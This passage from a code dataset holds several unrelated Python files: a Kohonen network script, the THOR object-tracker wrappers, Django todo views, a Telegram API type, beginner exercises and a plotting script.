y)\n newNeuron.values()\n return newNeuron\n\n# Applying Algorithms\nresult = []\ndef calculate():\n result = neuronPoints\n # Loop for n times\n numLoops = int(input(\"How many Iterations? \"))\n for i in range(0, numLoops):\n print(\"Iteration \" + str(i + 1) + \"... \")\n # Compare distance each neurons to each inputs\n for j in range(0, len(result)):\n # Smallest distance input => winner\n smallestDist = Vector2.distance(vectors[0], result[j])\n currentWinner = vectors[0]\n # One neuron for 3 inputs\n for i in range(1, len(vectors)):\n comparingDist = Vector2.distance(vectors[i], result[j])\n if comparingDist < smallestDist:\n smallestDist = comparingDist\n currentWinner = vectors[i]\n # Change weight\n result[j] = changedVector(result[j], currentWinner)\n draw(result)\n\n# MAIN\ndef main():\n neuronsCSVParse()\n draw(neuronPoints)\n neuronsCSVParse()\n draw(vectors)\n calculate()\n\nmain()\n","sub_path":"kohonen.py","file_name":"kohonen.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"42948191","text":"import sys\nimport json\nimport re\ninputFileName = \"logCommit.txt\"\n\nif len(sys.argv) >=2:\n inputFileName = sys.argv[1]\n\nf = open(inputFileName)\njsonData = json.load(sys.stdin)\nf.close()\n\nitems = jsonData[\"items\"]\nprint(\"items:\" + str(len(items)) )\nfor item in items:\n commit = item[\"commit\"]\n commitMessage = commit[\"message\"]\n urls = re.findall('(?:https?:\\/\\/|)[^\\s ]+\\/[0-9a-zA-Z]*' , commitMessage)\n for url in urls:\n print(url)\n","sub_path":"siteSearch/githubSearch/commitDigest.py","file_name":"commitDigest.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"633139422","text":"# --------------------------------------------------------\n# THOR\n# Licensed under The MIT License\n# Written by Axel Sauer (axel.sauer@tum.de)\n# --------------------------------------------------------\n\nimport abc\nfrom types import SimpleNamespace\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nimport cv2\nfrom scipy.signal import tukey\n\nfrom .utils import *\nfrom .modules import ST_Module, LT_Module, Dummy_Module\n\nMEDIATE_SIZE = 255\n\nclass THOR_Wrapper():\n def __init__(self, cfg, net):\n use_cuda = torch.cuda.is_available()\n self.device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n self._cfg = SimpleNamespace(**cfg)\n\n self._mem_len_total = self._cfg.K_st + self._cfg.K_lt\n assert self._cfg.K_lt > 0\n\n self.do_full_init = True\n self._net = net\n self._curr_type = 'lt'\n self.score_viz = None\n self.template_keys = ['im', 'raw', 'kernel', 'compare']\n\n def setup(self, im, pos, sz):\n \"\"\"\n initialize the short-term and long-term module\n \"\"\"\n self.avg_chans = np.mean(im, axis=(0, 1))\n self._frame_no = 0\n\n # make the template\n crop = self._get_crop(im, pos, sz)\n temp = self._make_template(crop)\n\n # initialize the short term module\n if self._cfg.K_st:\n self.st_module = ST_Module(K=self._cfg.K_st, template_keys=self.template_keys,\n calc_div=(self._cfg.lb_type=='dynamic'),\n verbose=self._cfg.verbose, viz=self._cfg.viz)\n else:\n self.st_module = Dummy_Module(self.template_keys)\n self.st_module.fill(temp)\n\n # initialize the long term module\n if self.do_full_init or self._cfg.vanilla:\n self.lt_module = LT_Module(K=self._cfg.K_lt, template_keys=self.template_keys,\n lb=self._cfg.lb, lb_type=self._cfg.lb_type,\n verbose=self._cfg.verbose, viz=self._cfg.viz)\n self.lt_module.fill(temp)\n self.do_full_init = False\n else:\n # reinitialize long term only at the beginning of the episode\n self.lt_module.update(temp, div_scale=0)\n\n def update(self, im, curr_crop, pos, sz):\n \"\"\"\n update the short-term and long-term module and\n update the shown templates and activations (score_viz)\n \"\"\"\n self._frame_no += 1\n\n # only update according to dilation steps\n if not self._frame_no%self._cfg.dilation:\n crop = self._get_crop(im, pos, sz)\n temp = self.crop_to_mem(crop)\n\n # reset st if it drifted\n if self._cfg.K_st and self._curr_type=='lt':\n self.st_module.fill(temp)\n\n if self._cfg.viz:\n self._show_modulate(torch_to_img(curr_crop), self.score_viz)\n self._show_templates('st')\n self._show_templates('lt')\n\n def crop_to_mem(self, crop):\n \"\"\"\n make the template and insert into modules\n \"\"\"\n temp = self._make_template(crop)\n\n # temp to st and lt module\n div_scale = self.st_module.update(temp)\n if self._cfg.K_lt > 1:\n self.lt_module.update(temp, div_scale=div_scale)\n\n return temp\n\n def _get_best_temp(self, pos, sz, score):\n \"\"\"\n determine the best template and return the prediction and the\n score of the best long-term template\n \"\"\"\n # get the best score in st and lt memory\n score_st, score_lt = np.split(score, [self._cfg.K_st])\n best_st = [] if not len(score_st) else np.argmax(score_st)\n best_lt = np.argmax(score_lt) + self._cfg.K_st\n\n # calculate iou and switch to lt if iou too low\n iou = self.get_IoU(pos.T[best_st], sz.T[best_st], pos.T[best_lt], sz.T[best_lt])\n self._curr_type = 'lt' if iou < self._cfg.iou_tresh else 'st'\n\n return (best_lt if self._curr_type=='lt' else best_st), score[best_lt]\n\n def _show_templates(self, mode='lt'):\n if mode=='st' and not self._cfg.K_st: return\n mem = self.st_module if mode=='st' else self.lt_module\n y_plot = 50 if mode=='st' else 300\n\n temp_canvas = mem.canvas.copy()\n cv2.imshow(f\"Templates {mode}\", temp_canvas)\n cv2.moveWindow(f\"Templates {mode}\", 1200, y_plot)\n\n @staticmethod\n def get_IoU(pos_1, sz_1, pos_2, sz_2):\n if not len(pos_1): return 0.0 # st memory is empty\n if not len(pos_2): return 1.0 # lt memory is empy\n return IOU_numpy(xywh_to_xyxy(np.append(pos_1, sz_1)), \\\n xywh_to_xyxy(np.append(pos_2, sz_2)))\n\n @staticmethod\n def modulate(score, mem_len, out_sz):\n \"\"\"\n modulate the prediction of each template with a mean activation map of all templates\n \"\"\"\n score_per_temp = int(np.prod(score.shape) / (mem_len * np.prod(out_sz)))\n score_im = score.reshape(mem_len, score_per_temp, *out_sz)\n score_mean = np.mean(score_im, axis=1)\n\n #modulation according to score:\n weights = np.max(score_mean, axis=(1, 2))\n weights = weights.reshape(len(weights), 1, 1)\n score_mean *= weights\n # modulate the mean with the weights\n score_mean_all = np.mean(score_mean, axis=0).reshape(1, *out_sz)\n score_mean_norm = score_mean_all/np.max(score_mean_all)\n\n # modulate: multiply with the mean\n mean_tiled = np.tile(score_mean_norm.reshape(1, -1), score_per_temp)\n score = score*mean_tiled\n return score, score_mean_norm\n\n @staticmethod\n def _show_modulate(im, score_viz):\n \"\"\"\n show the current activations on top of the current crop\n \"\"\"\n if score_viz is None: return # modulation is not active\n\n im = cv2.resize(im, (MEDIATE_SIZE, MEDIATE_SIZE)).astype(np.uint8)\n canvas = np.zeros([im.shape[0], im.shape[1], 3], dtype=np.uint8)\n\n # calculate the color map\n score_im_base = cv2.resize(score_viz[0], im.shape[:2])\n score_im_base = (255*score_im_base).astype(np.uint8)\n im_color = cv2.applyColorMap(score_im_base, cv2.COLORMAP_JET)\n\n # show the image\n overlayed_im = cv2.addWeighted(im, 0.8, im_color, 0.7, 0)\n canvas[:, :im.shape[1], :] = overlayed_im\n cv2.imshow('modulated', canvas)\n cv2.moveWindow('modulated', 1200, 800)\n\n @abc.abstractmethod\n def custom_forward(self, x):\n \"\"\"\n implements the forward pass through the network of the tracker\n with an added batch dimension [tracker specific]\n \"\"\"\n raise NotImplementedError(\"Must be implemented in subclass.\")\n\n @abc.abstractmethod\n def _get_crop(self, im, pos, sz):\n \"\"\"\n get the crop from the search window [tracker specific]\n \"\"\"\n raise NotImplementedError(\"Must be implemented in subclass.\")\n\n @abc.abstractmethod\n def _make_template(self, crop):\n \"\"\"\n given a crop, make a template [tracker specific]\n \"\"\"\n raise NotImplementedError(\"Must be implemented in subclass.\")\n\n @abc.abstractmethod\n def batch_evaluate(self, crop):\n \"\"\"\n take evalue method from original tracker and add batch processing for all\n templates in memory and add modulating [tracker specific]\n \"\"\"\n raise NotImplementedError(\"Must be implemented in subclass.\")\n\nclass THOR_SiamFC(THOR_Wrapper):\n def __init__(self, cfg, net):\n super(THOR_SiamFC, self).__init__(cfg, net)\n self.template_sz = 127\n self.kernel_sz = 6\n self.max_response = 0\n\n def _get_crop(self, im, pos, sz):\n context_sz = self._cfg.context_temp * np.sum(sz)\n crop = get_subwindow_tracking_SiamFC(im=im, pos=pos, model_sz=self.template_sz,\n context_sz=context_sz, avg_chans=self.avg_chans,\n target_sz=sz)\n return crop.unsqueeze(0)\n\n def _make_template(self, crop):\n temp = {}\n temp['raw'] = crop.to(self.device)\n temp['im'] = torch_to_img(crop)\n temp['kernel'] = self._net.feature(temp['raw'])\n\n # add the tukey window to the temp for comparison\n alpha = self._cfg.tukey_alpha\n win = np.outer(tukey(self.kernel_sz, alpha), tukey(self.kernel_sz, alpha))\n temp['compare'] = temp['kernel'] * torch.Tensor(win).to(self.device)\n return temp\n\n def custom_forward(self, x):\n x_f = self._net.feature(x) # 3 x 256 x 22 x 22\n kernel_cat = torch.cat(list(self.st_module.templates['kernel']) + \\\n list(self.lt_module.templates['kernel'])) # mem_len x 256 x 22 x 22\n\n # convolve\n out = F.conv2d(x_f, kernel_cat).permute(1, 0, 2, 3) # mem_len x 3 x 17 x 17\n\n # adjust the scale of the responses\n return out * 0.001\n\n def batch_evaluate(self, crop, old_pos, old_sz, p):\n # get responses\n responses = self.custom_forward(crop)\n responses = responses.data.cpu().numpy()\n batch_sz, scales = responses.shape[:2]\n\n\n # upscale\n upscale = lambda im: cv2.resize(im, (p.upscale_sz, p.upscale_sz),\n interpolation=cv2.INTER_CUBIC)\n responses = np.array([[upscale(responses[t, s]) for s in range(scales)] for t in range(batch_sz)])\n\n responses[:, :p.scale_num // 2] *= p.penalty_k\n responses[:, p.scale_num // 2 + 1:] *= p.penalty_k\n\n # get peak scale for every template\n scale_ids = np.argmax(np.amax(responses, axis=(2, 3)), axis=1)\n\n # apply penalty\n responses = responses[np.arange(batch_sz), scale_ids, :, :]\n responses -= np.min(responses, axis=(1,2)).reshape(-1,1,1)\n responses /= np.sum(responses, axis=(1,2)).reshape(-1,1,1)+ 1e-16\n responses = (1 - p.window_influence) * responses + \\\n p.window_influence * p.hann_window\n\n # mediating\n if self._cfg.modulate:\n old_shape = responses.shape\n responses = responses.reshape(batch_sz, -1)\n responses, self.score_viz = self.modulate(responses, self._mem_len_total, old_shape[-2:])\n responses = responses.reshape(*old_shape)\n\n # get the peak idcs\n get_peak_idx = lambda x: np.unravel_index(x.argmax(), x.shape)\n locs = [get_peak_idx(t) for t in responses]\n\n # locate target center\n disp_in_response = np.array(locs) - p.upscale_sz // 2\n disp_in_instance = disp_in_response * \\\n p.total_stride / p.response_up\n disp_in_image = disp_in_instance * p.x_sz * \\\n p.scale_factors[scale_ids].reshape(-1, 1) / p.instance_sz\n target_pos = old_pos + disp_in_image\n\n # update target size\n scale = (1 - p.lr) * 1.0 + \\\n p.lr * p.scale_factors[scale_ids].reshape(-1, 1)\n target_sz = old_sz*scale\n\n # normalize the scores to the score of the initial frame\n best_scores = np.max(responses, axis=(1,2))\n if not self.max_response:\n self.max_response = best_scores[0]\n best_scores = np.ones_like(best_scores)\n else:\n best_scores /= self.max_response\n best_scores = np.clip(best_scores, 0, 1)\n\n # determine the currently best template\n best_temp, lt_score = self._get_best_temp(target_pos.T, target_sz.T, best_scores)\n return target_pos[best_temp], target_sz[best_temp], lt_score, scale[best_temp]\n\nclass THOR_SiamRPN(THOR_Wrapper):\n def __init__(self, cfg, net):\n super(THOR_SiamRPN, self).__init__(cfg, net)\n self.template_sz = 127\n self.kernel_sz = 6\n self.template_keys += ['reg', 'cls', 'reg_anc', 'cls_anc']\n self.curr_temp = None\n\n def _get_crop(self, im, pos, sz):\n wc_z = sz[0] + self._cfg.context_temp * sum(sz)\n hc_z = sz[1] + self._cfg.context_temp * sum(sz)\n context_size = round(np.sqrt(wc_z * hc_z))\n\n crop = get_subwindow_tracking_SiamRPN(im=im, pos=pos, model_sz=self.template_sz,\n original_sz=context_size,\n avg_chans=self.avg_chans)\n return crop.unsqueeze(0)\n\n def _make_template(self, crop):\n temp = {}\n temp['raw'] = crop.to(self.device)\n temp['im'] = torch_to_img(crop)\n\n temp['kernel'] = self._net.featureExtract(temp['raw'])\n temp['reg'] = self._net.conv_r1(temp['kernel'])\n temp['cls'] = self._net.conv_cls1(temp['kernel'])\n t_s = temp['reg'].data.size()[-1]\n\n temp['reg_anc'] = temp['reg'].view(self._net.anchor*4, self._net.feature_out, t_s, t_s)\n temp['cls_anc'] = temp['cls'].view(self._net.anchor*2, self._net.feature_out, t_s, t_s)\n\n # add the tukey window to the temp for comparison\n alpha = self._cfg.tukey_alpha\n win = np.outer(tukey(self.kernel_sz, alpha), tukey(self.kernel_sz, alpha))\n temp['compare'] = temp['kernel'] * torch.Tensor(win).to(self.device)\n return temp\n\n def custom_forward(self, x):\n x_f = self._net.featureExtract(x)\n\n def reg_branch(x, reg_cat, l):\n out = F.conv2d(x, reg_cat)\n out = out.view(l, out.shape[1]//l, out.shape[2], out.shape[3])\n return out\n\n def cls_branch(x, cls_cat, l):\n out = F.conv2d(x, cls_cat)\n return out.view(l, out.shape[1]//l, out.shape[2], out.shape[3])\n\n # regression\n x_reg = self._net.conv_r2(x_f)\n reg_cat = torch.cat(list(self.st_module.templates['reg_anc']) + \\\n list(self.lt_module.templates['reg_anc']))\n reg_res = reg_branch(x_reg, reg_cat, self._mem_len_total)\n reg_res = self._net.regress_adjust(reg_res)\n\n # classification\n x_cls = self._net.conv_cls2(x_f)\n cls_cat = torch.cat(list(self.st_module.templates['cls_anc']) + \\\n list(self.lt_module.templates['cls_anc']))\n cls_res = cls_branch(x_cls, cls_cat, self._mem_len_total)\n\n return reg_res, cls_res, x_f\n\n def batch_evaluate(self, crop, pos, size, window, scale_z, p):\n \"\"\"\n adapted from SiamRPNs tracker_evaluate\n \"\"\"\n delta, score, x_f = self.custom_forward(crop)\n out_sz = score.shape[-2:]\n batch_sz = self._mem_len_total\n\n delta = delta.contiguous().view(batch_sz, 4, -1).data.cpu().numpy()\n score = F.softmax(score.contiguous().view(batch_sz, 2, -1), dim=1).data[:, 1, :].cpu().numpy()\n\n # delta regression\n anc = np.tile(p.anchor, (batch_sz, 1, 1))\n delta[:, 0, :] = delta[:, 0, :] * anc[:, :, 2] + anc[:, :, 0]\n delta[:, 1, :] = delta[:, 1, :] * anc[:, :, 3] + anc[:, :, 1]\n delta[:, 2, :] = np.exp(delta[:, 2, :]) * anc[:, :, 2]\n delta[:, 3, :] = np.exp(delta[:, 3, :]) *anc[:, :, 3]\n\n # penalizing\n def change(r):\n return np.maximum(r, 1./r)\n\n def sz(w, h):\n pad = (w + h) * 0.5\n sz2 = (w + pad) * (h + pad)\n return np.sqrt(sz2)\n\n def sz_wh(wh):\n pad = (wh[0] + wh[1]) * 0.5\n sz2 = (wh[0] + pad) * (wh[1] + pad)\n return np.sqrt(sz2)\n\n # scale penalty\n s_c = change(sz(delta[:, 2, :], delta[:, 3, :]) / (sz_wh(size)))\n # ratio penalty\n r_c = change((size[0] / size[1]) / (delta[:, 2, :] / delta[:, 3, :]))\n\n penalty = np.exp(-(r_c * s_c - 1.) * p.penalty_k)\n pscore = penalty * score\n pscore = pscore * (1 - p.window_influence) + window * p.window_influence\n\n # mediating\n if self._cfg.modulate:\n pscore, self.score_viz = self.modulate(pscore, self._mem_len_total, out_sz)\n\n # target regression\n best_pscore_id = np.argmax(pscore, axis=1)\n # arange is needed for correct indexing\n target = delta[np.arange(batch_sz), :, best_pscore_id] / scale_z\n target_sz = size / scale_z\n lr = penalty[np.arange(batch_sz), best_pscore_id] *\\\n score[np.arange(batch_sz), best_pscore_id] * p.lr\n\n res_x = target[:, 0] + pos[0]\n res_y = target[:, 1] + pos[1]\n res_w = target_sz[0] * (1 - lr) + target[:, 2] * lr\n res_h = target_sz[1] * (1 - lr) + target[:, 3] * lr\n\n target_pos = np.array([res_x, res_y])\n target_sz = np.array([res_w, res_h])\n best_scores = pscore[np.arange(batch_sz), best_pscore_id]\n\n # determine the currently best template\n best_temp, lt_score = self._get_best_temp(target_pos, target_sz, best_scores)\n return np.squeeze(target_pos[:, best_temp]), np.squeeze(target_sz[:, best_temp]), lt_score\n\nclass THOR_SiamMask(THOR_Wrapper):\n def __init__(self, cfg, net):\n super(THOR_SiamMask, self).__init__(cfg, net)\n self.template_sz = 127\n self.kernel_sz = 7\n\n def _get_crop(self, im, pos, sz):\n wc_z = sz[0] + self._cfg.context_temp * sum(sz)\n hc_z = sz[1] + self._cfg.context_temp * sum(sz)\n context_size = round(np.sqrt(wc_z * hc_z))\n\n crop = get_subwindow_tracking_SiamRPN(im=im, pos=pos, model_sz=self.template_sz,\n original_sz=context_size,\n avg_chans=self.avg_chans)\n return crop.unsqueeze(0)\n\n def _make_template(self, crop):\n temp = {}\n temp['raw'] = crop.to(self.device)\n temp['im'] = torch_to_img(crop)\n temp['kernel'] = self._net.template(temp['raw'])\n\n # add the tukey window to the temp for comparison\n alpha = self._cfg.tukey_alpha\n win = np.outer(tukey(self.kernel_sz, alpha), tukey(self.kernel_sz, alpha))\n temp['compare'] = temp['kernel'] * torch.Tensor(win).to(self.device)\n return temp\n\n def custom_forward(self, x):\n self._net.zf = torch.cat(list(self.st_module.templates['kernel']) + \\\n list(self.lt_module.templates['kernel']))\n pred_cls, pred_loc, _ = self._net.track_mask(x)\n return pred_loc, pred_cls\n\n def batch_evaluate(self, crop, pos, size, window, scale_x, p):\n \"\"\"\n adapted from SiamRPNs tracker_evaluate\n \"\"\"\n delta, score = self.custom_forward(crop)\n\n out_sz = score.shape[-2:]\n batch_sz = self._mem_len_total\n\n delta = delta.contiguous().view(batch_sz, 4, -1).data.cpu().numpy()\n score = F.softmax(score.contiguous().view(batch_sz, 2, -1), dim=1).data[:, 1, :].cpu().numpy()\n\n # delta regression\n anc = np.tile(p.anchor, (batch_sz, 1, 1))\n delta[:, 0, :] = delta[:, 0, :] * anc[:, :, 2] + anc[:, :, 0]\n delta[:, 1, :] = delta[:, 1, :] * anc[:, :, 3] + anc[:, :, 1]\n delta[:, 2, :] = np.exp(delta[:, 2, :]) * anc[:, :, 2]\n delta[:, 3, :] = np.exp(delta[:, 3, :]) *anc[:, :, 3]\n\n # penalizing\n def change(r):\n return np.maximum(r, 1./r)\n\n def sz(w, h):\n pad = (w + h) * 0.5\n sz2 = (w + pad) * (h + pad)\n return np.sqrt(sz2)\n\n def sz_wh(wh):\n pad = (wh[0] + wh[1]) * 0.5\n sz2 = (wh[0] + pad) * (wh[1] + pad)\n return np.sqrt(sz2)\n\n # scale penalty\n target_sz_in_crop = size*scale_x\n s_c = change(sz(delta[:, 2, :], delta[:, 3, :]) / (sz_wh(target_sz_in_crop)))\n # ratio penalty\n r_c = change((size[0] / size[1]) / (delta[:, 2, :] / delta[:, 3, :]))\n\n penalty = np.exp(-(r_c * s_c - 1.) * p.penalty_k)\n pscore = penalty * score\n pscore = pscore * (1 - p.window_influence) + window * p.window_influence\n\n # mediating\n if self._cfg.modulate:\n pscore, self.score_viz = self.modulate(pscore, self._mem_len_total, out_sz)\n\n # target regression\n best_pscore_id = np.argmax(pscore, axis=1)\n # arange is needed for correct indexing\n target = (delta[np.arange(batch_sz), :, best_pscore_id] / scale_x)\n lr = penalty[np.arange(batch_sz), best_pscore_id] *\\\n score[np.arange(batch_sz), best_pscore_id] * p.lr\n target, lr = target.astype(np.float64), lr.astype(np.float64)\n\n res_x = target[:, 0] + pos[0]\n res_y = target[:, 1] + pos[1]\n res_w = size[0] * (1 - lr) + target[:, 2] * lr\n res_h = size[1] * (1 - lr) + target[:, 3] * lr\n\n target_pos = np.array([res_x, res_y])\n target_sz = np.array([res_w, res_h])\n best_scores = pscore[np.arange(batch_sz), best_pscore_id]\n\n # determine the currently best template\n best_temp, lt_score = self._get_best_temp(target_pos, target_sz, best_scores)\n self._net.best_temp = best_temp\n\n return np.squeeze(target_pos[:, best_temp]), np.squeeze(target_sz[:, best_temp]), \\\n lt_score, best_pscore_id[best_temp]\n","sub_path":"trackers/THOR_modules/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":20984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"243077808","text":"\n\nfrom ..utils import Object\n\n\nclass NotificationTypeNewPushMessage(Object):\n \"\"\"\n New message was received through a push notification\n\n Attributes:\n ID (:obj:`str`): ``NotificationTypeNewPushMessage``\n\n Args:\n message_id (:obj:`int`):\n The message identifierThe message will not be available in the chat history, but the ID can be used in viewMessages and as reply_to_message_id\n sender_user_id (:obj:`int`):\n Sender of the messageCorresponding user may be inaccessible \n content (:class:`telegram.api.types.PushMessageContent`):\n Push message content\n\n Returns:\n NotificationType\n\n Raises:\n :class:`telegram.Error`\n \"\"\"\n ID = \"notificationTypeNewPushMessage\"\n\n def __init__(self, message_id, sender_user_id, content, **kwargs):\n \n self.message_id = message_id # int\n self.sender_user_id = sender_user_id # int\n self.content = content # PushMessageContent\n\n @staticmethod\n def read(q: dict, *args) -> \"NotificationTypeNewPushMessage\":\n message_id = q.get('message_id')\n sender_user_id = q.get('sender_user_id')\n content = Object.read(q.get('content'))\n return NotificationTypeNewPushMessage(message_id, sender_user_id, content)\n","sub_path":"pytglib/api/types/notification_type_new_push_message.py","file_name":"notification_type_new_push_message.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"562285231","text":"from django.http import HttpResponseNotAllowed\nfrom django.shortcuts import render, redirect\nfrom appTodolist.models import Task\nfrom django.views.decorators.csrf import csrf_exempt\n\n\ndef get_tasks(request):\n if request.method == 'GET':\n tasks = Task.objects.all()\n return render(request, 'appTodoList/tasks.html', {\n 'tasks': tasks\n })\n else:\n return HttpResponseNotAllowed(['GET'])\n\n\n@csrf_exempt\ndef add_task(request):\n if request.method == 'POST':\n if request.POST.get('name'):\n task = Task(name=request.POST.get('name'))\n task.save()\n return redirect('tasks:get_tasks')\n else:\n return HttpResponseNotAllowed(['POST'])\n\n\n@csrf_exempt\ndef set_done_task(request):\n if request.method == 'POST':\n task_id = request.POST.get(\"id\")\n if task_id is not None:\n task = Task.objects.get(pk=int(task_id))\n task.complete()\n task.save()\n return redirect('tasks:get_tasks')\n else:\n return HttpResponseNotAllowed(['POST'])","sub_path":"appTodolist/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"631272685","text":"from web_crawler import WebExecute\nimport sys\nimport sunback as sb\n\n\n# # Main Command Structure\ndef start(params):\n \"\"\"Select whether to run or to debug\"\"\"\n __print_header(params)\n \n if params.is_debug():\n __debug_mode(params)\n else:\n __run_mode(params)\n\n\ndef __print_header(params):\n print(\"\\nSunback: Live SDO Background Updater \\nWritten by Chris R. Gilly\")\n print(\"Check out my website: http://gilly.space\\n\")\n print(\"Delay: {} Seconds\".format(params.background_update_delay_seconds))\n # print(\"Coronagraph Mode: {} \\n\".format(params.mode()))\n \n if params.is_debug():\n print(\"DEBUG MODE\\n\")\n\n\ndef __debug_mode(params):\n \"\"\"Run the program in a way that will break\"\"\"\n while True:\n params.__execute_switch()\n\n\ndef __run_mode(params):\n \"\"\"Run the program in a way that won't break\"\"\"\n \n fail_count = 0\n fail_max = 10\n \n while True:\n try:\n __execute_switch(params)\n except (KeyboardInterrupt, SystemExit):\n print(\"\\n\\nOk, I'll Stop. Doot!\\n\")\n break\n except Exception as error:\n fail_count += 1\n if fail_count < fail_max:\n print(\"I failed, but I'm ignoring it. Count: {}/{}\\n\\n\".format(fail_count, fail_max))\n print(error)\n continue\n else:\n print(\"Too Many Failures, I Quit!\")\n sys.exit(1)\n\n\ndef __execute_switch(params):\n \"\"\"Select which data source to draw from\"\"\"\n theSun = sb.Sunback(params)\n if params.run_type().casefold() == \"web\".casefold():\n WebExecute(params).execute()\n elif params.run_type().casefold() == \"mr\".casefold():\n theSun.mr_execute()\n elif params.run_type().casefold() == \"jp\".casefold():\n theSun.jp_execute()\n elif params.run_type().casefold() == \"fido\".casefold():\n theSun.fido_execute()\n","sub_path":"sunback/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"640897373","text":"char={\"Name\": \"Light\",\n\"Age\": 17,\n\"Strength\": 8,\n\"Defense\": 10,\n\"HP\": 100,\n\"Backpack\": [\"Shield\", \"Bread\", \"Loaf\"],\n\"Gold\": 100,\n\"Level\": 2}\n\nchar[\"Gold\"]+=50\nchar[\"Backpack\"].append(\"Flintstone\")\nchar[\"pocket\"]= [\"monster\", \"fly\"]\nfor k,v in char.items():\n print(k,v)\n\nskill=[\n{\"Name\": \"Tackle\",\n\"Minimum level\": 2,\n\"Damage\": 5,\n\"Hit rate\": 30,},\n{\"Name\": \"Quick Attack\",\n\"Minimum level\": 5,\n\"Damage\": 3,\n\"Hit rate\": 50}]\n\nfor i in range(len(skill)):\n print(i+1, \".\", skill[i][\"Name\"])\n\nn=input(\"skill? \")\n#x=int(input(\"level? \"))\nimport random \nm= (random.randint(0,70))\n\nif n==skill[0][\"Name\"].lower() or n==skill[0][\"Name\"].upper():\n if char[\"Level\"]>=skill[0][\"Minimum level\"]:\n print(\"damage:\", 3)\n if m>30:\n print(\"truot roi\")\n else:\n print(\"oh ye\")\n elif char[\"Level\"]=skill[1][\"Minimum level\"]:\n print(\"damage:\", 3)\n if m>50:\n print(\"truot roi\")\n else:\n print(\"oh ye\")\n elif char[\"Level\"] current_number:\n list[j], list[i] = list[i], list[j]\n\n return list\n\n\nif __name__ == '__main__':\n assert insertion_sort([5, 3, 4, 7, 2, 8, 6, 9, 1]) == [1, 2, 3, 4, 5, 6, 7, 8, 9]\n # insertion_sort([27, 10, 12, 20, 25, 13, 15, 22])\n","sub_path":"insertion_sort.py","file_name":"insertion_sort.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"642362965","text":"#!/usr/bin/python\nimport matplotlib.pyplot as plt\nimport numpy as np\n# import matplotlib.lines as mlines\nimport matplotlib.ticker\nfrom matplotlib.ticker import FormatStrFormatter\nimport argparse\nimport matplotlib.gridspec as gridspec\nfrom plot.plotting_utilities import *\nfrom matplotlib import colors\nfrom cycler import cycler\nimport sys\nimport yaml\nimport re\nimport os\n\nthis_directory = os.path.dirname(os.path.realpath(__file__)) + \"/\"\n\n\nparser = argparse.ArgumentParser(\n description='Plot the collected stats into a grid of subplots with one line ' +\n 'per app.',\n usage='{} infile -o outfile'.format(sys.argv[0]))\n\nparser.add_argument('-i', '--infile', action='store', type=str,\n help='The input file that contains the data to plot.')\n\nparser.add_argument('-o', '--outdir', action='store', type=str,\n default='./', help='The directory to store the plots.')\n\nparser.add_argument('-y', '--yamlfile', type=str,\n default=this_directory+'plot_config.yml',\n help='The yaml config file.')\n\nparser.add_argument('-s', '--show', action='store_true',\n help='Show the plots or save only.')\n\nif __name__ == '__main__':\n # read cmd line options\n args = parser.parse_args()\n\n args.outdir = '{}/{}/'.format(args.outdir,\n args.infile.split('stats-')[1].split('.csv')[0])\n if not os.path.exists(args.outdir):\n os.makedirs(args.outdir)\n\n # read yaml config file\n yc = yaml.load(open(args.yamlfile, 'r'))\n locyc = yc[sys.argv[0].split('/')[-1]]\n globyc = yc['global']\n\n # read input file to datadir\n datadir = {}\n data = np.genfromtxt(args.infile, delimiter='\\t', dtype=str)\n header, data = data[0], data[1:]\n datadir = data_to_dir(header, data, ['metric', 'app_and_args', 'config'],\n keep_only=['num_kernels', 'valuelist'])\n\n # generate the figdir, groups input data, ready to be plotted\n figdir = {}\n bench_suite = ''\n for metric in datadir.keys():\n if metric not in locyc['stats_to_plot']:\n continue\n if metric not in figdir:\n figdir[metric] = {}\n for app in datadir[metric].keys():\n if 'sdk-4.1.15' in app:\n bench_suite = 'sdk'\n elif 'ispass2009-1.0' in app:\n bench_suite = 'ispass'\n elif 'rodinia-2.0-ft' in app:\n bench_suite = 'rodinia'\n elif 'parboil-0.2' in app:\n bench_suite = 'parboil'\n else:\n print('Benchmark suite {} not recognized.')\n exit(-1)\n for conf in datadir[metric][app].keys():\n matches = re.compile('([a-z]+)([0-9]*:?[0-9]*)').findall(conf)\n if not matches:\n continue\n knob = ','.join([m[0] for m in matches])\n if knob not in locyc['knobs_to_plot']:\n continue\n if knob not in figdir[metric]:\n figdir[metric][knob] = {}\n if app not in figdir[metric][knob]:\n figdir[metric][knob][app] = {'x': [], 'y': []}\n\n # Only using the first knob\n x = float(matches[0][1].split(':')[0])\n y = float(datadir[metric][app][conf][1])\n if not np.isnan(y):\n figdir[metric][knob][app]['x'].append(x)\n figdir[metric][knob][app]['y'].append(y)\n\n # iterate over the figdir and plot\n for metric in figdir.keys():\n for knob in figdir[metric].keys():\n # Only using the first knob\n knob1 = knob.split(',')[0]\n outdir = args.outdir + '/' + globyc['knobs'][knob1]\n if not os.path.exists(outdir):\n os.makedirs(outdir)\n rows = locyc[bench_suite]['grid']['rows']\n cols = locyc[bench_suite]['grid']['columns']\n figsize = (2. * cols, 2.*rows)\n fig = plt.figure(figsize=figsize)\n fig.suptitle('Knob:{}, Stat:{}'.format(globyc['knobs'][knob1],\n globyc['stat_shorts'][metric]))\n outfile = '{}/{}-{}.jpeg'.format(outdir,\n globyc['stat_shorts'][metric],\n globyc['knobs'][knob1])\n gs = gridspec.GridSpec(rows, cols)\n idx = 0\n yavg_l = []\n for app in figdir[metric][knob].keys():\n x = np.array(figdir[metric][knob][app]['x'])\n y = 